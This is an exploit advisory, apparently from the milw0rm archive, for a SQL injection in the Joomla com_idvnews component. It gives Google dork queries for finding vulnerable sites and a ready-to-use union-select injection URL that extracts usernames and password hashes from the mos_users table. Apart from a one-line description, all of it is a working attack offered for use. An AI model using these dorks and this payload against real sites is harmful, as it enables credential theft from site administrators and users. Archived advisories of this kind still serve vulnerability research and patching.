The Joomla com_idvnews component suffers from a remote SQL injection vulnerability.
f97694b941ccabd240fc09d56a9972580ac5a68fda5ac08ff1c1f8249fc07673
###############################################################
#
# joomla SQL Injection(com_idvnews)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : https://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl:"com_idvnews"cat_id
#
# DORK 2 : allinurl:
#
################################################################
EXPLOIT :
index.php?option=com_idvnews&id=-1/**/union/**/select/**/0,concat(username,0x3a,password),2222,concat(username,0x3a,password),0,0,0,0/**/from/**/mos_users/*
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################